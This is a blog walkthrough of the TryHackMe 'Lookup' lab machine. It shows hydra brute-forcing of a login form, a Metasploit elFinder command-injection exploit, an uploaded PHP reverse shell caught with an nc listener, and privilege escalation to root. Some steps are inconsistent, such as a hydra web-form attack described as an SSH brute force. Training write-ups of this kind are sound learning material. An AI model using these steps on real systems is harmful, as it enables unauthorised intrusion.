Open in app

Sign in

Write

Sign in

THM-Lookup-Writeup

Mohamed Ali
5 min readNov 24, 2024

--

Test your enumeration skills on this boot-to-root machine.

My All Social Media Accounts : Social Accounts

Find This Room: Lookup

Task 1 Lookup

Lookup offers a treasure trove of learning opportunities for aspiring hackers. This intriguing machine showcases various real-world vulnerabilities, ranging from web application weaknesses to privilege escalation techniques. By exploring and exploiting these vulnerabilities, hackers can sharpen their skills and gain invaluable experience in ethical hacking. Through “Lookup,” hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices. The machine also challenges hackers to automate tasks, demonstrating the power of scripting in penetration testing.

Note: For free users, it is recommended to use your own VM if you’ll ever experience problems visualizing the site. Please allow 3–5 minutes for the VM to fully boot up.

Recon

whoami@mint:~/Desktop/THM-Lab/Lookup$ nmap -sV -sC -A -T4 lookup.thm 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-11-23 23:30 EET
Nmap scan report for lookup.thm (10.10.255.186)
Host is up (0.38s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Login Page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.25 seconds

We Have 2 Port is Open:

22 SSH

80 HTTP

When examining the source code of the page, we find login.php

Let’s do a brute force attack on ssh

whoami@mint:~/Desktop/THM-Lab/Lookup$ hydra -l admin -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login:username=^USER^&password=^PASS^F:wrong password" -V -I -t 64

Found:

Username: admin
Password: password123

When registering, it says that there is an error in the username or password. Now we will try to guess the correct username

whoami@mint:~/Desktop/THM-Lab/Lookup$ hydra -L /usr/share/wordlists/SecLists/Usernames/Names/names.txt -p password123 lookup.thm http-post-form "/login:username=^USER^&password=^PASS^F:Invalid login" -V -I -t 64

Now We Have jose is username at server

Will Try login Now

As you can see we have a subdomain name that we will add to our hosts list

Great, Read More About Elfinder

We will try to log into SSH with the existing information

whoami@mint:~/Desktop/THM-Lab/Lookup$ ssh user@lookup.thm
The authenticity of host 'lookup.thm (10.10.255.186)' can't be established.
ED25519 key fingerprint is SHA256:Ndgax/DOZA6JS00F3afY6VbwjVhV2fg5OAMP9TqPAOs.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:17: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'lookup.thm' (ED25519) to the list of known hosts.
think@lookup.thm's password: 
Permission denied, please try again.
think@lookup.thm's password:

We will search Metasploit for the elfinder exploit

search elfinder

We found the exploit

exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection

And we had a meterpreter session

meterpreter > sysinfo
Computer    : lookup
OS          : Linux lookup 5.4.0-156-generic #173-Ubuntu SMP Tue Jul 11 07:25:22 UTC 2023 x86_64
Meterpreter : php/linux

We will use our own shell since we cannot read the files because we are not root

From Rev Shells

meterpreter > getsystem
[-] The "getsystem" command requires the "priv" extension to be loaded (run: `load priv`)
meterpreter > upload shell.php
[*] Uploading  : /home/whoami/Desktop/THM-Lab/Lookup/shell.php -> shell.php
[*] Uploaded -1.00 B of 2.52 KiB (-0.04%): /home/whoami/Desktop/THM-Lab/Lookup/shell.php -> shell.php
[*] Completed  : /home/whoami/Desktop/THM-Lab/Lookup/shell.php -> shell.php
meterpreter >
whoami@mint:~/Desktop/THM-Lab/Lookup$ nc -lnvp 5555
Listening on 0.0.0.0 5555
Connection received on 10.10.snip.190 34148
Linux lookup 5.4.0-156-generic #173-Ubuntu SMP Tue Jul 11 07:25:22 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 01:49:32 up 18 min,  0 users,  load average: 0.00, 0.00, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$

Let’s go put linpeas

Found new password for ssh login

josemario.AKA(think)

Now let’s cap the first flag

ssh think@lookup.thm

PrivEsc

Go to GTFBins

Now We are ROOOOOOT!

BOOOOOOM!

Tryhackme Writeup
Look Up
Red Team Exercises

--

--

Mohamed Ali
Mohamed Ali

Written by Mohamed Ali

47 Followers
5 Following

Security Researcher

Responses (1)

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams